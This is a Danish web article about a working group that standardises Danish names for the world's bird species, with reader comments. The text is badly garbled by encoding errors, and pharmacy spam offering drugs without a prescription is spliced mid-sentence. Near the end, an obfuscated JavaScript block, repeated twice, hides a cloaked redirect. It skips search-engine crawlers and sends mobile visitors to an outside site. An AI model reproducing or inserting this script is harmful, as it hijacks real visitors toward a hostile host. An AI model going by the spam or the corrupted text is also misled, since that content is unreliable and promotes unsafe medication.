SPROGMUSEET

Redaktør: Ole Stig Andersen

10.000 danske fuglenavne

Gulspurv er ikke en spurv men derimod en vAi??rling og burde retteligen hedde GulvAi??rling

Gulspurv er ikke en spurv men derimod en vAi??rling og burde retteligen hedde GulvAi??rling. Ai?? Svend RA?nnest

BomlAi??rke er ikke en lAi??rke, men er i nAi??r familie med vAi??rlinger. Har da ogsA? tidligere heddet KornvAi??rling. Der er stadig stor diskussion om artens rette navn

BomlAi??rke er ikke en lAi??rke, men er i nAi??r familie med vAi??rlinger. Har da ogsA? tidligere heddet KornvAi??rling. Der er stadig stor diskussion om artens rette navn. Ai?? Svend RA?nnest

Der har vAi??ret en betydelig uorden i danske fuglenavne. Det gAi??lder bA?de navnene pA? hjemlige og navnene pA? mere fremmede og fjerne arter.

Nogle arter kaldes flere forskellige ting. Fuglenavne der optrAi??der i udenlandske medier oversAi??ttes forskelligt, og nogle fuglegrupper er ret usystematiske i navngivningen. Der er f.eks et vAi??rre rod i gruppen af smA?finker: de hedder pA? tvAi??rs af de forskellige familier sisken eller irisk; vAi??rlinger kaldes spurve osv. Nogle navne er overflA?digt lange. Skal den danske RA?rhA?ne nA?dvendigvis ogsA? kaldes GrA?nbenet, nA?r den nu Canada Pharmacy Online provides you more options to buy Paxil or/and generic Paroxetine. You can order your prescription drugs online, via fax or email or buy paroxetine online cheap. Buy Paroxetine online after comparing prices. Order Paxil without a prescription. How much does generic Paxil cost? cheap lioresal. er den eneste rA?rhA?neart vi har?

For at lA?se den slags problemer har reprAi??sentanter for foreninger og institutioner med interesse for fuglenavne i en A?rrAi??kke arbejdet pA? at standardisere de danske navne pA? verdens knap 10.000 fuglearter.

Dette er sket i samarbejde med lignende bestrAi??belser i andre lande og med tilsvarende forsA?g pA? at fastlAi??gge en udtA?mmende navngivning af andre dyregrupper, som fx insekter og pattedyr.

Indledning

Navnegruppen (NAG) blev stiftet den 20. januar 1996, efter et stA?rre forarbejde af nu afdA?de Lasse Kreutzfeld samt nuvAi??rende medlem af NAG, JA?rgen MA?ller Hansen. Dette vigtige forarbejde bestod bl.a. i at samle et arbejdskatalog af dels Ai??ldre forslag fra bA?ger og tidsskrifter, samt af helt nye forslag. Efter et utrAi??tteligt, stAi??digt og meget prisvAi??rdigt forarbejde ai??i?? der begyndte allerede i 1991 ai??i?? var endelig en ny gruppe i gang i januar 1996. En gruppe bestA?ende af reprAi??sentanter fra fire foreninger/institutioner med en fAi??lles interesse og berA?ringsflade for fuglenavne og navngivning, nemlig Dansk Ornitologisk Forening (DOF), Landsorganisationen Danske Fugleforeninger (LDF), Zoologisk Museum (ZM) og de danske Zoologiske Haver.

NAG kan betragtes som Danmarks uofficielle organ for vedtagelse af danske fuglenavne, idet gruppen er godkendt af DOFA?s og LDFA?s hovedbestyrelser med mandat til at etablere moderne, meningsfulde og udtalevenlige danske navne for alle verdens fuglearter. Navnegruppen bestA?r af 9 medlemmer, der alle har interesse for navngivning, og som har haft brug for at forholde sig til dette i forskellige sammenhAi??nge. Det gAi??lder i forhold til Danske Fugleforeningers medlemmer, Zoologiske Haver, Zoologisk Museum og i Dansk Ornitologisk Forening. Dertil kommer enkeltpersoner, som har leveret vAi??rdifulde kommentarer til gruppens arbejde.

NAG er en del af en trend i at navngive danske dyr. Projekt Danske Dyrenavne under SA?ren Breiting er gA?et i gang med at navngive de ca 20.000 insekter og leddyr og andre smA?dyr, der lever eller forekommer i Danmark. IfA?lge SA?ren Breiting er der er mange gode grunde til at vAi??lge danske navne pA? unavngivne dyregrupper, ikke mindst af pAi??dagogiske A?rsager. Vi skal have navne pA? sA? mange ting som muligt i vores indbyrdes kommunikation.

Selve motivationen til at gA? i gang med et sA? omfattende arbejde, skulle nok findes i en stA?rre forvirring omkring navngivning af arter uden for den VestpalAi??arktiske region. Dette har i mange tilfAi??lde vAi??ret sAi??rligt tydeligt i naturudsendelser i fjernsynet, nA?r lange engelske fuglenavne skulle fordanskes. Eller at se en Tv-udsendelse med Stormfugle, og se en Mollymawk (en gruppe af smA? Albatrosser fra de sydlige verdenshave (I dag hedder hele gruppen Albatros, og Mollymawk er et Ai??ldre engelsk ord)) blive oversat med Mallemuk (vor egen lokale stormfugl), har vAi??ret en god grund til at tage affAi??re. Derudover har det vAi??ret et problem nA?r foreninger/institutioner med fAi??lles interesse og berA?ringsflade for fuglenavne anvendte forskellige navne.

Gruppens medlemmer

Gruppens medlemmer har i siden stiftelsen i 1996 bestA?et af Lars NA?rgaard Andersen, Jon FjeldsA?, Ole Geertz-Hansen, Ivan Olsen, Svend RA?nnest, Mogens Behnke-Pedersen (lidt inde i forlA?bet), alle reprAi??sentanter for Dansk Ornitologisk Forening og samtidig er Jon FjeldsA? ogsA? reprAi??sentant for Zoologisk Museum. JA?rgen MA?ller Hansen, Flemming Nielsen, Henning Pust er reprAi??sentanter for Landsorganisationen Danske Fugleforeninger og samtidig er Flemming Nielsen ogsA? reprAi??sentant for de danske Zoologiske Haver. I det fA?rste A?r af navnegruppens virke var Lasse Kreutzfeld (indtil sin dA?d) medlem af arbejdsgruppen og i en A?rrAi??kke ogsA? Lars Gissing-Hansen, begge reprAi??sentanter for DOF. Som ekstern konsulent virkede Finn Frandsen i de fA?rste A?r.

Gruppens medlemmer har samlet set rejst i alle verdensdele og tilsammen set nolvadex for sale, generic Zoloft. over halvdelen af verdens fuglearter! Dette har givet et godt grundlag for et seriA?st arbejde. Samtidig har alle i gruppen tilgang til enten eget omfattende bibliotek eller DOFai??i??s endnu mere omfattende bibliotek, sA?ledes at god tekstbeskrivelse samt billedmateriale har dannet grundlag for navnevedtagelserne.

Navngivningens udgangspunkt

I arbejdet med taksonomien har Navnegruppen fra starten anvendt Monroe og Sibleys A World Checklist of Birds (1993) som grundlag og udgangspunkt for navngivningsarbejdet. Denne checkliste er baseret pA? samme forfatteres Distibution and Taxonomy of Birds of the World (1990) samt et Supplement til dette (1993). Disse vAi??rker er meget roste, men der har ogsA? vAi??ret skarp kritik af en rAi??kke aspekter i deres arbejde. Uanset sidstnAi??vnte kritik, var der dog bred enighed i gruppen om, at denne checkliste kunne regnes for den hidtil bedste ved NAGs etableringstidspunkt i januar 1996. NAGs ekspert pA? det taksonomiske omrA?de, Jon FjeldsA?, argumenterede fra starten ret prAi??cis for perspektiverne og det hensigtsmAi??ssige i at bruge netop denne checkliste til NAGs arbejde.

Monroe & Sibleys checkliste indeholder 9.702 listede arter, hvoraf de 68 regnes for uddA?de. Hertil kommer et stort antal ai???underarter/delarterai??? (component species), dvs. potentielle arter, som for nuvAi??rende har formel status som underarter under bredt accepterede arter.

Siden Monroe & Sibleys checkliste i 1993, har verden set en hA?ndfuld nye lister over verdens fugle, bl.a. World Bird Species Checklist ai??i?? with alternative english and scientific names (M.G. Wells 1998) og Birds of the World ai??i?? A Checklist (James F.Clements 2000). Desuden har det store, til skyerne roste, vAi??rk, Handbook of the Birds of the World (del Hoyo, J., Elliott, A. & Sargatal, J. ai??i?? eds.) vAi??ret i gang siden 1992, med tolv fAi??rdige bind ved A?rsskiftet 2007/2008.

Disse lister og vAi??rker er i kraft af deres udgivelsestidspunkter i stand til at fremvise alle nybeskrevne arter siden Monroe og Sibley, samt ikke mindst samle op og gA?re status i forhold til mange af de potentielle arter, der listes i Monroe og Sibley som ai???del-arterai???. Mange af disse er allerede bredt accepterede, gode arter, men der er ogsA? i de nye vAi??rker bredt accepterede arter med, som end ikke optrAi??der som ai???del-arterai??? i Monroe og Sibley ai??i?? hovedsageligt ai???nye arterai???, hvor DNA-materiale har spillet en vAi??sentlig rolle for deres status.

NAG har valgt at fA?lge Monroe og Sibleys checkliste til vejs ende, men har allerede, som en naturlig ting, inddraget de nybeskrevne arter i vores navneliste/navngivning. Desuden har vi medtaget bredt accepterede arter, som enten ikke er nAi??vnt eller stA?r som ai???del-artai??? i Monroe og Sibley. Verdenslisten, der fA?lger systematikken i Monroe og Sibley, er siden blevet fulgt op af et lAi??ngerevarende arbejde af en gruppe under Frank Gill og Minturn Wright (Birds of the World ai??i?? Recommended English Names) som NAG ogsA? har arbejdet ud fra. Der har i den engelsksprogede verden lAi??nge vAi??ret uoverensstemmelser mellem forskellige navne (Hawk i Amerika og Buzzard i England for MusvA?ger). Dette vAi??rk et forsA?g pA? at standardisere navnene. I det hele taget har de engelske ord vAi??ret stor inspirationskilde for mange af vore navne, lige som det videnskabelige navn ogsA? har.

Flere andre lande er ogsA? i gang med eller allerede fAi??rdige med at give nationale navne til alverdens fugle. BA?de Norge og Sverige er fAi??rdige, Tyskland er langt, Spanien ligesA? og hovedparten af de europAi??iske lande har navngivet de vestpalAi??arktiske fugle.

Hvorfor A?nsker man at standardisere fuglenavnene? Hvorfor kan de ikke bare hedde forskelligt?

Det gA?r selvfA?lgelig ikke noget at forskellige personer kalder forskellige ting noget forskelligt. Bare de husker at kalde tingene det samme fra gang til gang. Det gA?r imidlertid al samtale noget lettere, hvis man kan bruge et fAi??lles ordforrA?d. Af rent pAi??dagogiske grunde er det praktisk hvis navnene ogsA? har et dansk tilsnit. Det kan give associationer til noget kendt og bliver ikke afskrAi??kkende og fremmedgjort.

Principper for navngivning

Gruppens udgangspunkter i navngivningsarbejdet er baseret pA? 2 forskellige grundprincipper:
Vore egne Principper for Navngivning:

  1. De bA?r vAi??re hA?ndterlige, altsA? sA? korte som muligt, lette at udtale og sprogligt gode, uden for mange led.
  2. Navnene bA?r vAi??re i overensstemmelse med moderne taksonomi, hvilket f.eks. betyder, at Fluesnapperne skal opdeles i Amerikanske Fluesnappere (Tyranidae) Tyraner, Afroasiatiske Fluesnappere (Monarchidae) Monarkfluesnappere og Eurasiske Fluesnappere (Muscicapidae) Fluesnappere. Der skal samtidig tilstrAi??bes en vis systematisk logik i navngivningen.
  3. Navnet bA?r vAi??re selvforklarende og indlysende. Det skal sA? vidt muligt referere til artens udbredelse (isAi??r for arter som er endemiske for et mindre omrA?de, f.eks A?er), dragtkarakterer eller andre karakteristika ved fuglen, tilholdssted eller habitatvalg, dens lyd eller specielle adfAi??rdstrAi??k. Navnet skal ogsA? vAi??re logisk set i forhold til artens samlede udbredelsesomrA?de. De bA?r vAi??re karakteriserende for fuglene. Der kan her forekomme geografiske navne, som i almindelighed vil vAi??re ukendt pA? dansk, f.eks Punaibis (Puna er grAi??slandet i Andesbjergene i f.eks Bolivia og Peru). Geografiske navne kan forandres efter skiftende regeringer: Formosa til Taiwan, Celebes til Sulawesi eller Abessinien til Etiopien. Det bA?r ikke fA? indflydelse pA? et allerede givet navn. SammensAi??tningen af et mindre kendt geografisk stednavn og et mindre kendt familienavn kan skabe problemer med genkendelse og udtale. I de tilfAi??lde er navnet delt af en bindestreg.
  4. De bA?r ikke indeholde personnavne. Nogle navne er dog allerede sA? indarbejdede, at det i praksis ikke er muligt, og vel egentlig ogsA? anstA?deligt, at Ai??ndre dem. (Stellersand, BonapartesmA?ge, Temmincksryle)
  5. Der vil vAi??re direkte overtagelse af fremmedsprogede navne, som allerede er indarbejdede i det ornitologiske sprog. Til eksempel Trogon, Mannakin, Bulbul.
  6. Navnene bA?r ikke vAi??re direkte misvisende; F.eks. at kalde visse amerikanske “Redstarts” (Skovsangere) uden rA?dt i halen for RA?dstjert, eller f.eks. at anvende betegnelsen ai???Almindeligai???.
  7. Hvor det er muligt og givtigt, bA?r navnene findes blandt allerede eksisterende forslag. (HAi??vdprincippet)
  8. Navnelisten skal ikke tages til indtAi??gt for en taksonomisk opfattelse.
  9. Navnene skal ske pA? grundlag af officiel dansk retstavning (med 2 undtagelser: Stillits og Ederfugl)
    Bindestreg anvendes for at lette lAi??sevenligheden. Der, hvor der optrAi??der usAi??dvanlige ord i bA?de for- og efternavn, indsAi??ttes bindestreg.

Finn Frandsen har udarbejdet 10 “Tommelfinger-regler”. Af disse har udvalget arbejdet efter fA?lgende 7 (let omskrevne):

Ordet Skade henviser ikke til at fuglene gA?r skade pA? noget eller nogen. Derimod er det et gammelt dansk ord for sort-hvid. Her Strandskade ...

Ordet Skade henviser ikke til at fuglene gA?r skade pA? noget eller nogen. Derimod er det et gammelt dansk ord for sort-hvid. Her Strandskade ... Ai?? Svend RA?nnest

... og Husskade.

... og Husskade. Ai?? Svend RA?nnest

Skovskaden skal sA? leve med at blive kaldt en skade pA? trods af, at den ikke er sort/hvid og heller                              	    ikke er skadevoldende. SidstnAi??vnte ord er iA?vrigt svAi??rt at forholde sig til som A?kolog

Skovskaden skal sA? leve med at blive kaldt en skade pA? trods af, at den ikke er sort/hvid og heller ikke er skadevoldende. SidstnAi??vnte ord er iA?vrigt svAi??rt at forholde sig til som A?kolog. Ai?? Svend RA?nnest

  • 1 a. Et artsnavn bA?r hA?jst bestA? af 2 led.
  • b. Uanset om et artsnavn er enkelt-leddet (solitAi??rt) eller 2-leddet, bA?r det hA?jst rumme 4 rodord (Hals- bA?nd-s-trold-and; RA?d-top-pet Fugl-e-konge)
  • 2. En fAi??lles basis for navngivningen af en hel slAi??gt eller dele deraf bA?r vAi??re karakteristisk for de fleste ai??i?? meget gerne alle ai??i?? af de pA?gAi??ldende arter.
  • 3. Basen bA?r ikke bestemmes af en overfladisk lighed med ikke-beslAi??gtede arter (Stor A?rkendompap; Kapdue).
  • 4. Et solitAi??rt navn bA?r foretrAi??kkes frem for et 2-leddet, hvis sammenkoblingen med basen kan ske uden at gA?re vold pA? sproget (GrA?nspAi??tte frem for GrA?n SpAi??tte; BlA? KAi??rhA?g frem for BlA?kAi??rhA?g)
  • 5 a. Det ord, der kobles til basen, bA?r vAi??re umiddelbart forstA?eligt og ikke krAi??ve specialviden.
  • b. Det mA? helst ikke give fuglens navn en fonetisk lighed med en anden arts navn (GrA?mejse/BlA?mejse; BA?gesanger/HA?gesanger)
  • c. Kombinationen bA?r ikke vAi??re fonetisk uheldig.
  • d. Kombinationen bA?r ikke vAi??re semantisk uheldig (A?rkenager-hA?ne)
  • 6. Hvis et geografisk navn skal indgA? i et artsnavn, mA? det vAi??re karakteristisk for netop den pA?gAi??ldende art! Det skal passe ind i dansk udtaletradition og bA?r sA? vidt muligt kunne indgA? som en del af et solitAi??rt navn!
  • 7. Et artsnavn bA?r vAi??re betegnende for alle artens eventuelle underarter.

Selv med sA? mange elementer inde over navngivning (eller mA?ske netop derfor), har vi flere gange mA?ttet lave undtagelser fra vore principper. BAi??r venligst over med det! Fritz Palmquist har meget venligt gjort opmAi??rksom pA? fejl og mangler i vore principper. Vi har sA? vidt muligt rettet ind efter hans rA?d. Ligeledes har SA?ren Breiting udformet nogle principper for navngivning af Dyr i Danmark. Vi har ogsA? skelet til disse og implementeret dem i vore.

Gruppens fremtid

Navnegruppen hA?ber selvsagt, at de foreslA?ede navne vil blive brugt. Foreninger og institutioner bag gruppen anbefaler enstemmigt, at de navne, som anfA?res i listen, fA?lges.

At der er kommet en anbefalet liste over alverdens fuglenavne betyder ikke nA?dvendigvis, at det danske sprog skal forarmes. Navne som Brunnakke, Perleand, Dyttelytter, PryllemAi??nd, Styllepik, Skovduer og Grossenollikok vil forhA?bentlig ikke forsvinde ud af det danske sprog. Disse er tegn pA? en opfattelse af en fugl eller en fuglegruppe, pA? en udvikling, som ikke holder op med denne liste.

Der vil ogsA? i fremtiden vAi??re behov for en Navnegruppe til at justere Ai??ndringer, enten taksonomiske, i henhold til nye arter, eller i henhold til en sproglig udvikling. Mindst 6 forskellige forhold kan gA?re sig gAi??ldende i et fremtidigt arbejde i en Navnegruppe:

  1. Der er f.eks et vAi??rre rod i gruppen af smA?finker: de hedder pA? tvAi??rs af de forskellige familier sisken eller irisk. RA?rspurv, Gulspurv og Snespurv forekommer blandt en mAi??ngde vAi??rlinger.
  2. Svaleklire hedder sA?dan fordi den i flugten har mindelser om en Bysvale. Den amerikanske pendant til vor Svaleklire har ikke den hvide overgump, der giver mindelser om en Bysvale. Skal sA?danne uoverensstemmelser tilpasses?
  3. Stellersand er navngivet efter Georg Wilhelm StAi??hler, hvis navn blev angliseret til Steller. Hvis tyskerne pA? et tidspunkt gA?r krav pA? StAi??hlers tilhA?rsforhold, skal den sA? hedde StAi??hlersand? Kuhls SkrA?pe fra Atlanten er beskrevet af Cory, hedder pA? engelsk Coryai??i??s Shearwater og er pA? dansk opkaldt efter en af Temmincks assistenter! Endnu er der ikke helt styr pA? hvilken af de 3 former af Kuhls SkrA?pe, der er set i Danmark. NA?r der er styr pA? det, hvad skal de sA? hedde? Og skal et personnavn reflektere en person, der har gjort meget for et omrA?des fugleliv (A. Wilson eller J.J. Audubon i Amerika), en eller anden nAi??r ven eller familiemedlem af en sA?dan (E. Sabine), eller en person, som ikke har gjort noget specielt for ornitologien (L. Schwarz)? Og kan en fugl bAi??re en sur og vrangvillig persons navn og bAi??re dennes karakteristika videre (J.R. Forster)?
  4. Farver. Det engelske sprog indeholder navne pA? langt flere farver end det (gAi??ngse) danske. Mange fugle med brunlige nuancer kan hedde noget med rA?d eller brun. Vor opfattelse af en farve kan vise sig ikke at holde, og der vil vAi??re behov for at omdA?be en art.
  5. Geografiske stednavne er et bestandigt problem: Burma skifter navn til Myanmar, Ceylon til Sri Lanka, Formosa til Taiwan og det stopper ikke her.
  6. Lange navne har altid vAi??ret et irritationsmoment. Skal de gA?res kortere? GrA?nbenet RA?rhA?ne er unA?digt langt. Da der ikke findes andre RA?rhA?ns i Europa kunne vi vel nA?jes med at kalde den det?
GrA?nbenet rA?rhA?ne. Hvorfor ikke bare RA?rhA?ne nA?r den alligevel er den neste rA?rhA?ne i Europa

GrA?nbenet rA?rhA?ne. Hvorfor ikke bare RA?rhA?ne nA?r den alligevel er den eneste rA?rhA?ne i Europa? Ai?? J.M. Garg

I takt med at beskrivelser af fugle inddrager flere og flere dele af fuglene, vil der ogsA? pA? et tidspunkt vAi??re et behov for en standardiseret navngivning af fuglenes topografi pA? dansk.

Navnegruppen har efter bedste evne sat sig for at give de bedste navne. I nogle tilfAi??lde er bedste evne ikke godt nok, og navnet kan af mere eller mindre indlysende grunde vAi??re uheldigt eller forkert. I sA? fald vil gruppen meget gerne hA?re om det og vil efterfA?lgende tage stilling til navngivningen. Da listen samtidig publiceres pA? flere hjemmesider, har vi mulighed for at komme med hurtige rettelser. Vi er derfor interesserede i henvendelser i tilfAi??lde af sA?danne uheldige navne.KommentAi??r pA? Navnegruppens e-mail adresse.

Hjemmeside og bog

Navnegruppens formA?l er ikke alene at navngive alverdens fuglearter, men selvfA?lgelig ogsA? at delagtiggA?re interesserede brugere i gruppens arbejde og navnevalg. Vi har derfor valgt at lAi??gge gruppens arbejde pA? DOFA?s og LDFA?s hjemmeside som separate PDF-filer. Disse filer kan frit hentes, lAi??ses og kommenteres af enhver, der har en computer med netopkobling.

Desuden er gruppens arbejde udgivet i bogform med yderligere oplysninger om taksonomiske tilhA?rsforhold og forandringer samt illustrationer af Jon FjeldsA?.

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Læs også:

  1. Hvor slemt stA?r det til med dansk sprog? Dansk er et af verdens allerstA?rste sprog. PA? de fleste opgA?relser over antal sprogbrugere rangerer dansk i top-100 ud af tusindvis af sprog. Dansk er ogsA? et af verdens allerbedst...
  2. Danske dialekter lever i virkeligheden For nylig deltog jeg i et nordisk møde for danske lektorer i Norden hvor jeg holdt et indlæg om de danske dialekter. Titlen var: ”Er der liv i dialekterne i...
  3. Danske dialekter lever "Dialektforskning i 100 år" En af sommerens berigende læseoplevelser fik jeg da jeg læste artikelsamlingen Dialektforskning i 100 år. Udgivet af Afdeling for Dialektforskning ved Københavns Universitet i anledning af...
  4. Den Danske Ordbog på nettet ordnet.dk/ddo Siden november 2009 har Den Danske Ordbog været tilgængelig på nettet. Redaktionen af Sprogmuseet har i den anledning bedt mig give en omtale af ordbogen, dens omfang og anlæg...
Tagget med: , , ,

6 kommentarer

  1. Två ornitologer, Tommy Tyrberg och Lars Larsson har satt svenska namn på jordens alla kända fågelarter. Ett gigantiskt arbete som tog flera år (10500 arter). Om man vill titta närmare på dessa artnamn, kan man gå in på Sveriges Ornitologiska Förenings webbplats. Se även intervju med Tommy Tyrberg!

  2. Under læsning af maritim litteratur om Grønland er jeg stødt på en fregat (1736-37) med navnet ‘Blaa Heyren’ /blåhejren). Bygget og døbt i 1734.

    Jeg har derefter fundet at samme navn blev brugt til en ældre fregat (1694), der måske er bygget 10-20 år tidligere.

